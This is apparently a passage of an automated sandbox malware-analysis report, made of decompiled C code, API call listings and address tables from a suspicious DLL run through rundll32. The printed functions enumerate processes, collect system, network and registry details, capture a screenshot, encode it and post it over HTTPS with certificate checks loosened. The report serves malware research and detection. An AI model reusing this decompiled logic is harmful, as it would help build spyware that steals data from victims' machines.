0x10005b48
0x10005b73
0x10005b76
0x10005b7d
0x00000000
0x00000000
0x10005b4e
0x10005b53
0x10005b55
0x10005b6c
0x10005b71
0x00000000
0x10005b71
0x10005b59
0x10005b5e
0x10005b61
0x10005b63
0x00000000
0x00000000
0x10005b6a
0x00000000
0x10005b6a
0x10005b7f
0x10005b83
0x10005b8a
0x10005b91
0x10005b91
0x10005b97
0x10005b9c
0x10005ba6
0x10005ba6
0x10005bab
0x10005bad
0x00000000
0x00000000
0x10005bb8
0x10005bb8
0x10005bba
0x10005bbf
0x10005bc1
0x00000000
0x00000000
0x10005bb6
0x10005bb6
0x10005bca
0x10005bcf
0x10005bd8
0x10005bdb
0x10005be0
0x10005be3
0x10005bea
0x10005bef
0x10005bf3
0x10005bf6
0x10005bfa
0x10005bfa
0x10005c01
0x10005c02
0x10005c03
0x10005c05
0x10005c13
0x10005c18
0x10005c1a
0x10005c07
0x10005c0c
0x10005c0e
0x10005c0e
0x10005c1f
0x00000000
0x00000000
0x10005c30
0x10005c47
0x10005c4c
0x10005c4e
0x10005c52
0x10005c55
0x00000000
0x00000000
0x00000000
0x10005c55
0x10005c34
0x10005c39
0x10005c3e
0x00000000
0x00000000
0x10005c45
0x00000000
0x10005c45
0x10005c5b
0x10005c62
0x10005c69
0x10005c69
0x10005c71
0x10005c79
0x10005f09
0x10005f0c
0x10005f14
0x10005f1a
0x10005f1b
0x10005ba4
0x10005ba4
0x00000000
0x10005c7f
0x10005c89
0x10005ca0
0x10005ca2
0x10005c8b
0x10005c91
0x10005c96
0x10005c98
0x10005c98
0x10005dd5
0x10005dd5
0x10005dd7
0x10005ddc
0x10005dde
0x00000000
0x00000000
0x10005cb1
0x10005cb3
0x10005cb5
0x10005dec
0x10005df7
0x10005e07
0x10005e12
0x10005e1f
0x10005e25
0x10005e4b
0x10005e51
0x10005e57
0x10005e5f
0x10005e75
0x10005e75
0x10005e7c
0x10005e92
0x10005e97
0x10005ea6
0x10005eac
0x10005eb1
0x10005eb2
0x10005ed2
0x10005ed8
0x10005ede
0x10005ee3
0x10005ee8
0x10005eea
0x10005eee
0x10005ef4
0x10005ef9
0x10005efd
0x00000000
0x10005f08
0x10005cbb
0x10005cbd
0x10005cc2
0x10005cc5
0x10005cc7
0x10005d96
0x10005db6
0x10005dbc
0x10005dc2
0x10005dca
0x10005dcf
0x10005dd2
0x00000000
0x10005dd2
0x10005ccd
0x10005cd4
0x10005cd6
0x10005cd8
0x10005d88
0x10005d8a
0x10005d8f
0x10005d92
0x10005d94
0x00000000
0x00000000
0x00000000
0x10005d94
0x10005cf0
0x10005cf3
0x10005cf8
0x10005cff
0x10005d03
0x10005d04
0x10005d07
0x10005d09
0x10005d0a
0x10005d13
0x10005d0c
0x10005d0c
0x10005d0c
0x10005d18
0x10005d1b
0x10005d1d
0x10005d25
0x10005d4c
0x10005d52
0x10005d58
0x10005d5e
0x10005d66
0x10005d6b
0x10005d6e
0x10005d71
0x10005d71
0x10005d77
0x10005d7f
0x10005d85
0x00000000
0x10005de4
0x10005b9f
0x10005b9f
0x00000000
0x10005b9f

APIs

Part of subcall function 10005528: WSAStartup.WS2_32(00000202,?), ref: 10005557
Part of subcall function 10005528: gethostname.WS2_32(00000000,00000104), ref: 1000556C
Part of subcall function 10005528: gethostbyname.WS2_32(00000000), ref: 10005576
Part of subcall function 10005528: WSACleanup.WS2_32 ref: 100055BA

Sleep.KERNEL32(00002710,?,00000000), ref: 10005B1F

Part of subcall function 1000586A: lstrlenA.KERNEL32(?,00002710,771CC486,10005B3D,?,00000000), ref: 1000587A

Sleep.KERNEL32(00002710,?,00000000), ref: 10005B34

Part of subcall function 10004946: lstrlenA.KERNEL32(100075DC), ref: 10004B20
Part of subcall function 10004946: lstrlenA.KERNEL32(100075DC), ref: 10004B39
Part of subcall function 10004946: lstrlenA.KERNEL32(100075DC), ref: 10004B72
Part of subcall function 10004946: lstrlenA.KERNEL32(100075DC), ref: 10004B8B
Part of subcall function 10004946: lstrlenA.KERNEL32(100075DC), ref: 10004BAF
Part of subcall function 10004946: lstrlenA.KERNEL32(100075DC), ref: 10004BC8
Part of subcall function 10004946: lstrlenA.KERNEL32(100075DC), ref: 10004BFE
Part of subcall function 10004946: lstrlenA.KERNEL32(100075DC), ref: 10004C17

Part of subcall function 100055C8: lstrcmpiA.KERNEL32(?,?,00000000,771CC486,00000000,10005B53,00000000,?,00000000), ref: 100055E0

Sleep.KERNELBASE(001B7740,00000000,?,00000000), ref: 10005B6A
Sleep.KERNELBASE(00002710,00000000,?,00000000), ref: 10005B71
Sleep.KERNEL32(00002710,00000000,?,00000000), ref: 10005BA4
Sleep.KERNEL32(00002710,?,00000000), ref: 10005BB6

Part of subcall function 10005696: lstrlenA.KERNEL32(00000000,771CA28A,00000000,00000000,?,10004C56,00000000,00000000), ref: 100056C3
Part of subcall function 10005696: wsprintfA.USER32 ref: 10005725

Part of subcall function 10004F4D: InternetReadFile.WININET(00000000,00000024,00000024,00000000), ref: 10004FC8

Part of subcall function 100050E9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,771CC486,00000000,?,?,?,10005C39,00000000,00000000,00000000,00000000), ref: 1000513C
Part of subcall function 100050E9: lstrlenA.KERNEL32(00000000,?,?,?,10005C39,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005144
Part of subcall function 100050E9: wsprintfA.USER32 ref: 1000515A

Sleep.KERNEL32(001B7740,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005C45
Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005C4C

Part of subcall function 10005FD4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,10005CB1,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005FEE
Part of subcall function 10005FD4: wsprintfA.USER32 ref: 10006004

Part of subcall function 100062CD: wsprintfA.USER32 ref: 10006306

Part of subcall function 1000602C: lstrcmpiA.KERNEL32(?,?), ref: 10006105
Part of subcall function 1000602C: lstrcmpiA.KERNEL32(?,00000000), ref: 10006141
Part of subcall function 1000602C: lstrcmpiA.KERNEL32(?,?), ref: 10006159
Part of subcall function 1000602C: lstrcmpiA.KERNEL32(?,?), ref: 10006171
Part of subcall function 1000602C: lstrcmpiA.KERNEL32(?,?), ref: 10006189
Part of subcall function 1000602C: lstrcmpiA.KERNEL32(?,?), ref: 100061A1
Part of subcall function 1000602C: lstrcmpiA.KERNEL32(?,?), ref: 100061B1
Part of subcall function 1000602C: lstrcmpiA.KERNEL32(?,10005DDC), ref: 100061EE
Part of subcall function 1000602C: lstrcmpiA.KERNEL32(?,00000000), ref: 100061FA
Part of subcall function 1000602C: lstrcmpiA.KERNEL32(?,00000000), ref: 1000623A

Part of subcall function 10005920: RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,10005DF1), ref: 10005957
Part of subcall function 10005920: RegCreateKeyExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,?,10005DF1,00000000,00000000,00000000,00000000,00000000), ref: 1000596E
Part of subcall function 10005920: lstrlenA.KERNEL32(00000000,?,10005DF1,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005989
Part of subcall function 10005920: lstrlenA.KERNEL32(00000000,?,10005DF1,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005999
Part of subcall function 10005920: RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000000,?,10005DF1,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 100059A5
Part of subcall function 10005920: RegCloseKey.ADVAPI32(00000000,?,10005DF1,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 100059BC

Part of subcall function 10003EC9: GetProcessHeap.KERNEL32(?,10002F51,?,00000000,?,?,?,10002D0F,1000719C,0000001B,?,00000000,?,?,10002CB3,?), ref: 10003ECC
Part of subcall function 10003EC9: RtlAllocateHeap.NTDLL(00000000,00000008,?,?,10002F51,?,00000000,?,?,?,10002D0F,1000719C,0000001B,?,00000000), ref: 10003ED8

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005E04
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 10005E15
lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 10005E73
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 10005E86

Part of subcall function 10003EE0: GetProcessHeap.KERNEL32(?,10002D2E,00000000,?,00000000,?,?,10002CB3,?), ref: 10003EE3
Part of subcall function 10003EE0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10003EF9

Part of subcall function 10006457: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10006491
Part of subcall function 10006457: lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 1000649A
Part of subcall function 10006457: lstrlenA.KERNEL32( - ,?,?,00000000), ref: 100064A7
Part of subcall function 10006457: wsprintfA.USER32 ref: 100064DF
Part of subcall function 10006457: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100064EF

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100044CA, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E100044CA() {
				char _v264;
				void* _v300;
				void* _t10;
				int _t17;
				int _t24;
				int _t26;
				int _t29;
				void* _t30;
				int _t33;
				void* _t34;
				void* _t35;

				_t33 = 0;
				_t10 = CreateToolhelp32Snapshot(2, 0); // executed
				_t34 = _t10;
				_v300 = 0x128;
				Process32First(_t34,  &_v300); // executed
				_t29 = 0;
				do {
					_push( &_v264);
					_t29 = _t29 + E10002B95() + 1;
					_t17 = Process32Next(_t34,  &_v300); // executed
				} while (_t17 != 0);
				_t5 = _t29 + 1; // 0x1
				_t30 = E10003F01();
				Process32First(_t34,  &_v300); // executed
				do {
					_push( &_v264);
					_t24 = wsprintfA(_t30 + _t33, "%s");
					_t35 = _t35 + 0xc;
					_t33 = _t33 + _t24;
					_t26 = Process32Next(_t34,  &_v300); // executed
				} while (_t26 != 0);
				CloseHandle(_t34);
				return _t30;
			}

0x100044d6
0x100044db
0x100044e0
0x100044e2
0x100044f4
0x100044f9
0x100044fb
0x10004501
0x10004509
0x10004513
0x10004518
0x1000451c
0x10004526
0x10004530
0x10004535
0x1000453b
0x10004545
0x1000454b
0x1000454e
0x10004558
0x1000455d
0x10004562
0x10004570

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100044DB
Process32First.KERNEL32(00000000,00000128), ref: 100044F4
Process32Next.KERNEL32(00000000,00000128), ref: 10004513
Process32First.KERNEL32(00000000,00000128), ref: 10004530
wsprintfA.USER32 ref: 10004545
Process32Next.KERNEL32(00000000,?), ref: 10004558
CloseHandle.KERNEL32(00000000), ref: 10004562

Strings

%s, xrefs: 1000453F

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10004830, Relevance: 10.6, APIs: 7, Instructions: 108
network

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E10004830(intOrPtr __ecx, void** _a4, long _a8) {
				void _v8;
				void* _v12;
				void _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				char* _t30;
				void* _t31;
				void* _t32;
				char* _t33;
				void* _t35;
				long _t41;
				int _t42;
				void _t50;
				void** _t57;
				long _t60;
				void* _t64;

				_t50 = 0;
				_v28 = __ecx;
				_t30 = E100051F6(__ecx);
				_t60 = 3;
				_t59 =  !=  ? _t60 : 0;
				_t31 = InternetOpenA( *(__ecx + 4),  !=  ? _t60 : 0, _t30, 0, 0); // executed
				_v32 = _t31;
				_t32 = InternetConnectA(_t31,  *(__ecx + 8), 0x1bb, 0, 0, _t60, 0, 0); // executed
				_v20 = _t32;
				_t33 = E10004E51(__ecx, _t30); // executed
				_t35 = HttpOpenRequestA(_v20, E10002F3F(__ecx, 0x10007508, 4), _t33, 0, 0, 0, 0x800000, 0); // executed
				_v12 = _t35;
				_v24 = 4;
				InternetQueryOptionA(_t35, 0x1f,  &_v8,  &_v24);
				_v8 = _v8 | 0x00003180;
				InternetSetOptionA(_v12, 0x1f,  &_v8, 4);
				E10003F0A(_t34);
				E10003F0A(_t33);
				_push(_a8);
				_t41 = E10002B95();
				_t64 = _v12;
				_t42 = HttpSendRequestA(_t64, 0, 0, _a8, _t41); // executed
				_v16 = 0;
				if(_t42 != 0) {
					_a8 = 4;
					 *((char*)(_v28 + 0x22)) = 1;
					HttpQueryInfoA(_t64, 0x20000013,  &_v16,  &_a8, 0);
					_t50 = _v16;
				}
				_t57 = _a4;
				_t57[1] = _v20;
				_t57[2] = _t64;
				 *_t57 = _v32;
				return _t50;
			}

0x1000483a
0x1000483d
0x10004840
0x10004847
0x1000484f
0x10004856
0x10004869
0x1000486d
0x10004875
0x10004878
0x1000489d
0x100048a6
0x100048ad
0x100048b8
0x100048be
0x100048d0
0x100048d7
0x100048dd
0x100048e2
0x100048e5
0x100048ea
0x100048f7
0x100048fd
0x10004902
0x10004908
0x1000490f
0x10004921
0x10004927
0x10004927
0x1000492a
0x10004931
0x10004937
0x1000493a
0x10004943

APIs

InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10004856
InternetConnectA.WININET(00000000,?,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 1000486D

Part of subcall function 10004E51: wsprintfA.USER32 ref: 10004F05

HttpOpenRequestA.WININET(?,00000000,00000000,00000000,00000000,00000000,00800000,00000000), ref: 1000489D
InternetQueryOptionA.WININET(00000000,0000001F,00000000,10005A22), ref: 100048B8
InternetSetOptionA.WININET(00000000,0000001F,00003180,00000004), ref: 100048D0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100048F7
HttpQueryInfoA.WININET(00000000,20000013,00000004,00000004,00000000), ref: 10004921

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10004946, Relevance: 10.3, APIs: 8, Instructions: 299
string

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E10004946(intOrPtr __ecx, void* __edx, void* __eflags) {
				char _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _t98;
				char _t99;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t106;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				void* _t144;
				intOrPtr _t178;
				intOrPtr _t182;
				char _t183;
				void* _t184;
				intOrPtr _t187;
				intOrPtr _t200;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t206;
				intOrPtr _t207;
				intOrPtr _t208;
				intOrPtr _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t219;
				void* _t220;
				void* _t221;
				void* _t223;
				void* _t224;
				void* _t227;
				void* _t246;

				_t232 = __eflags;
				_t182 = __ecx;
				_v56 = __ecx;
				_t98 = E10004383(__ecx, __edx, __eflags); // executed
				_v5 = _t98;
				_t99 = E10004126(__ecx); // executed
				_v6 = _t99;
				_t100 = E100044CA(); // executed
				_push(_t100);
				_v84 = _t100;
				_v96 = E10002B95();
				_t102 = E1000418B(_t232); // executed
				_push(_t102);
				_v80 = _t102;
				_t200 = E10002B95();
				_v92 = _t200;
				_t104 = E10004571(); // executed
				_push(_t104);
				_v76 = _t104;
				_v52 = E10002B95();
				_t186 = _t182;
				_t106 = E100051F6(_t182);
				_push(_t106);
				_v100 = _t106;
				_t208 = E10002B95();
				_v36 = _t208;
				_t108 = E10002F3F(_t182, 0x100074ec, 5);
				_push(_t108);
				_v72 = _t108;
				_v48 = E10002B95();
				_t110 = E10002F3F(_t182, 0x100074f4, 6);
				_push(_t110);
				_v68 = _t110;
				_v24 = E10002B95();
				_t112 = E10002F3F(_t182, 0x100075d0, 0xa);
				_push(_t112);
				_v64 = _t112;
				_v28 = E10002B95();
				_t114 = E10002F3F(_t182, 0x100074fc, 6);
				_push(_t114);
				_v60 = _t114;
				_v32 = E10002B95();
				_t183 = 0;
				_v44 = 0;
				_v20 = 0;
				_t117 = E1000460D(_t186,  &_v20); // executed
				_t187 = _t117;
				_v12 = 0;
				_t223 = _t221 + 0x44;
				_v88 = _t187;
				_v16 = 0;
				_t118 = 0;
				_v40 = 0;
				if(_t187 != 0 && _v20 > 0) {
					_t178 = E10002D8F(_t187, _v20); // executed
					_t206 = _t178;
					_push(_t206);
					_v12 = _t206;
					_t183 = E10002B95();
					_v44 = _t183;
					E10003F0A(_v88);
					_t207 = E10002F3F(_t187, 0x10007504, 4);
					_push(_t207);
					_v16 = _t207;
					_t118 = E10002B95();
					_t200 = _v92;
					_t223 = _t223 + 0x1c;
					_v40 = 0;
				}
				_t209 = _v96;
				_t195 = _t118 + _t183 + _v32 + _v28 + _v24 + _v48 + _t208 + _v52 + _t200;
				_push(_t209 + 7 + _t118 + _t183 + _v32 + _v28 + _v24 + _v48 + _t208 + _v52 + _t200);
				_t184 = E10003F01();
				E100030DF(_t184,  &_v5, 1);
				_t45 = _t184 + 1; // 0x1
				E100030DF(_t45,  &_v6, 1);
				_t47 = _t184 + 2; // 0x2
				E100030DF(_t47, _v84, _t209);
				_t129 = _v80;
				_t224 = _t223 + 0x28;
				_t210 = _t209 + 2;
				if(_v80 != 0 && _t200 > 0) {
					E100030DF(_t210 + _t184, _t129, _t200);
					_t224 = _t224 + 0xc;
					_t210 = _t210 + _t200;
				}
				_t201 = _v48;
				E100030DF(_t210 + _t184, _v72, _t201);
				_t211 = _t210 + _t201;
				_t202 = _v52;
				E100030DF(_t211 + _t184, _v76, _t202);
				_t212 = _t211 + _t202;
				E100030DF(_t212 + _t184, 0x100075dc, lstrlenA(0x100075dc));
				_t213 = _t212 + lstrlenA(0x100075dc);
				E100030DF(_t213 + _t184, _v68, _v24);
				_t214 = _t213 + _v24;
				E100030DF(_t214 + _t184, _v64, _v28);
				_t227 = _t224 + 0x3c;
				_t215 = _t214 + _v28;
				if( *((char*)(_v56 + 0x20)) != 0) {
					E100030DF(_t215 + _t184, 0x100075dc, lstrlenA(0x100075dc));
					_t220 = _t215 + lstrlenA(0x100075dc);
					E100030DF(_t220 + _t184, _v60, _v32);
					_t227 = _t227 + 0x18;
					_t215 = _t220 + _v32;
				}
				if(_v36 > 0) {
					E100030DF(_t215 + _t184, 0x100075dc, lstrlenA(0x100075dc));
					_t219 = _t215 + lstrlenA(0x100075dc);
					E100030DF(_t219 + _t184, _v100, _v36);
					_t227 = _t227 + 0x18;
					_t215 = _t219 + _v36;
				}
				if(_v16 != 0 && _v40 > 0 && _v12 != 0 && _v44 > 0) {
					E100030DF(_t215 + _t184, 0x100075dc, lstrlenA(0x100075dc));
					_t246 = _t215 + lstrlenA(0x100075dc) + _t184;
					E100030DF(_t215 + lstrlenA(0x100075dc) + _t184, _v16, _v40);
					E100030DF(_t215 + lstrlenA(0x100075dc) + _t184 + _v40, _v12, _v44);
					_t227 = _t227 + 0x24;
				}
				_t144 = E10005696(_v56, _t246, E10002F3F(_t195, 0x10007392, 1), _t184); // executed
				E10003F0A(_v12); // executed
				E10003F0A(_v16);
				E10003F0A(_v60);
				E10003F0A(_t143);
				E10003F0A(_t184);
				E10003F0A(_v64);
				E10003F0A(_v68);
				E10003F0A(_v72);
				E10003F0A(_v76);
				E10003F0A(_v80);
				E10003F0A(_v84);
				return _t144;
			}

0x10004946
0x1000494e
0x10004951
0x10004954
0x10004959
0x1000495c
0x10004961
0x10004964
0x10004969
0x1000496a
0x10004972
0x10004975
0x1000497a
0x1000497b
0x10004983
0x10004985
0x10004988
0x1000498d
0x1000498e
0x10004999
0x1000499c
0x1000499e
0x100049a3
0x100049a4
0x100049ac
0x100049b5
0x100049b8
0x100049bd
0x100049be
0x100049cd
0x100049d0
0x100049d5
0x100049d6
0x100049e5
0x100049e8
0x100049ed
0x100049ee
0x100049fd
0x10004a00
0x10004a05
0x10004a06
0x10004a0e
0x10004a11
0x10004a16
0x10004a1a
0x10004a1d
0x10004a22
0x10004a24
0x10004a27
0x10004a2a
0x10004a2d
0x10004a30
0x10004a32
0x10004a37
0x10004a42
0x10004a47
0x10004a49
0x10004a4a
0x10004a55
0x10004a57
0x10004a5a
0x10004a6b
0x10004a6d
0x10004a6e
0x10004a71
0x10004a76
0x10004a79
0x10004a7c
0x10004a7c
0x10004a90
0x10004a96
0x10004a9d
0x10004aa3
0x10004aac
0x10004ab7
0x10004abb
0x10004ac4
0x10004ac8
0x10004acd
0x10004ad0
0x10004ad3
0x10004ad8
0x10004ae4
0x10004ae9
0x10004aec
0x10004aec
0x10004aee
0x10004af9
0x10004afe
0x10004b00
0x10004b0b
0x10004b13
0x10004b2c
0x10004b3e
0x10004b47
0x10004b4c
0x10004b59
0x10004b61
0x10004b64
0x10004b6b
0x10004b7e
0x10004b90
0x10004b99
0x10004b9e
0x10004ba1
0x10004ba1
0x10004ba8
0x10004bbb
0x10004bcd
0x10004bd6
0x10004bdb
0x10004bde
0x10004bde
0x10004be5
0x10004c0a
0x10004c22
0x10004c25
0x10004c34
0x10004c39
0x10004c39
0x10004c51
0x10004c5b
0x10004c63
0x10004c6b
0x10004c71
0x10004c77
0x10004c7f
0x10004c87
0x10004c8f
0x10004c97
0x10004c9f
0x10004ca7
0x10004cb7

APIs

Part of subcall function 10004383: GetVersionExA.KERNEL32(0000009C,?,?,00000000), ref: 100043B4
Part of subcall function 10004383: GetSystemInfo.KERNELBASE(?,?,?,00000000), ref: 100043C1
Part of subcall function 10004383: GetSystemMetrics.USER32(00000059), ref: 1000449F
Part of subcall function 10004383: GetSystemMetrics.USER32(00000059), ref: 100044AF

Part of subcall function 10004126: GetCurrentProcess.KERNEL32(00000000,?,?,10004961,00002710,771CC486), ref: 10004132
Part of subcall function 10004126: IsWow64Process.KERNELBASE(00000000,?,?,10004961,00002710,771CC486), ref: 10004139

Part of subcall function 100044CA: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100044DB
Part of subcall function 100044CA: Process32First.KERNEL32(00000000,00000128), ref: 100044F4
Part of subcall function 100044CA: Process32Next.KERNEL32(00000000,00000128), ref: 10004513
Part of subcall function 100044CA: Process32First.KERNEL32(00000000,00000128), ref: 10004530
Part of subcall function 100044CA: wsprintfA.USER32 ref: 10004545
Part of subcall function 100044CA: Process32Next.KERNEL32(00000000,?), ref: 10004558
Part of subcall function 100044CA: CloseHandle.KERNEL32(00000000), ref: 10004562

Part of subcall function 1000418B: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,771CC486), ref: 100041A1
Part of subcall function 1000418B: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,771CC486), ref: 100041CD
Part of subcall function 1000418B: lstrlenW.KERNEL32( - ,00000000,00000000,00000000,00000000,771CC486,00002710,771CC486,00000000), ref: 100041DA
Part of subcall function 1000418B: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000497A,00000000), ref: 100041EC
Part of subcall function 1000418B: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000497A,00000000), ref: 100041F7
Part of subcall function 1000418B: wsprintfW.USER32 ref: 100042C8
Part of subcall function 1000418B: wsprintfW.USER32 ref: 10004318
Part of subcall function 1000418B: wsprintfW.USER32 ref: 1000433D

Part of subcall function 10004571: RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,00000001,771CC486,771CC486,00000000,?,?,?,1000498D,00000000,00000000,00002710,771CC486,00000000), ref: 10004597
Part of subcall function 10004571: RegQueryValueExA.KERNEL32(771CC486,10007360,00000000,00000000,00000000,00000000,?,?,?,1000498D,00000000,00000000,00002710,771CC486,00000000), ref: 100045B7
Part of subcall function 10004571: RegQueryValueExA.KERNEL32(771CC486,10007360,00000000,00000000,00000000,00000000,?,?,?,1000498D,00000000,00000000,00002710,771CC486,00000000), ref: 100045D5
Part of subcall function 10004571: RegCloseKey.ADVAPI32(771CC486,?,?,?,1000498D,00000000,00000000,00002710,771CC486,00000000), ref: 100045DE

Part of subcall function 1000460D: Sleep.KERNELBASE(000003E8,?,00000000,00000000,00000000,100074FC,00000006,00000000,100075D0,0000000A,00000000,100074F4,00000006,00000000,100074EC,00000005), ref: 1000462E
Part of subcall function 1000460D: GdiplusStartup.GDIPLUS(00000005,0000000A,00000000,?,?,?,?,?,?,?,00000000,00000000,00000000,100074FC,00000006,00000000), ref: 10004677
Part of subcall function 1000460D: GdipSaveImageToStream.GDIPLUS(?,00000000,100074FC,00000000,?,?,00000005,0000000A,00000000), ref: 100046BA
Part of subcall function 1000460D: GdiplusShutdown.GDIPLUS(00000005,00000005,0000000A,00000000,?,?,?,?,?,?,?,00000000,00000000,00000000,100074FC,00000006), ref: 1000470F

lstrlenA.KERNEL32(100075DC), ref: 10004B20
lstrlenA.KERNEL32(100075DC), ref: 10004B39
lstrlenA.KERNEL32(100075DC), ref: 10004B72
lstrlenA.KERNEL32(100075DC), ref: 10004B8B
lstrlenA.KERNEL32(100075DC), ref: 10004BAF
lstrlenA.KERNEL32(100075DC), ref: 10004BC8
lstrlenA.KERNEL32(100075DC), ref: 10004BFE
lstrlenA.KERNEL32(100075DC), ref: 10004C17

Part of subcall function 10005696: lstrlenA.KERNEL32(00000000,771CA28A,00000000,00000000,?,10004C56,00000000,00000000), ref: 100056C3
Part of subcall function 10005696: wsprintfA.USER32 ref: 10005725

Part of subcall function 10002D8F: CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,00000000), ref: 10002DAB
Part of subcall function 10002D8F: CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,00000000), ref: 10002DC8

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10003E7D, Relevance: 9.0, APIs: 6, Instructions: 32
sleeptime

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10003E7D() {
				signed int _v8;
				union _LARGE_INTEGER _v12;
				struct _FILETIME _v20;

				Sleep(0); // executed
				QueryPerformanceCounter( &_v12); // executed
				Sleep(0); // executed
				GetSystemTimeAsFileTime( &_v20);
				Sleep(0); // executed
				return GetTickCount() ^ _v20.dwLowDateTime ^ _v20.dwHighDateTime ^ _v12.LowPart ^ _v8;
			}

0x10003e8e
0x10003e94
0x10003e9c
0x10003ea2
0x10003eb6
0x10003ec8

APIs

Sleep.KERNELBASE(00000000,00000000,00000000,00000000,?,10004E88,00000006,00000005,00000003,00000000,00000000,?,?,?,?,1000487D), ref: 10003E8E
RtlQueryPerformanceCounter.NTDLL(00000006,?,10004E88,00000006,00000005,00000003,00000000,00000000,?,?,?,?,1000487D,?,?,10005A22), ref: 10003E94
Sleep.KERNELBASE(00000000,?,10004E88,00000006,00000005,00000003,00000000,00000000,?,?,?,?,1000487D,?,?,10005A22), ref: 10003E9C
GetSystemTimeAsFileTime.KERNEL32(?,?,10004E88,00000006,00000005,00000003,00000000,00000000,?,?,?,?,1000487D,?,?,10005A22), ref: 10003EA2
Sleep.KERNELBASE(00000000,?,10004E88,00000006,00000005,00000003,00000000,00000000,?,?,?,?,1000487D,?,?,10005A22), ref: 10003EB6
GetTickCount.KERNEL32(?,10004E88,00000006,00000005,00000003,00000000,00000000,?,?,?,?,1000487D,?,?,10005A22,?), ref: 10003EB8

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

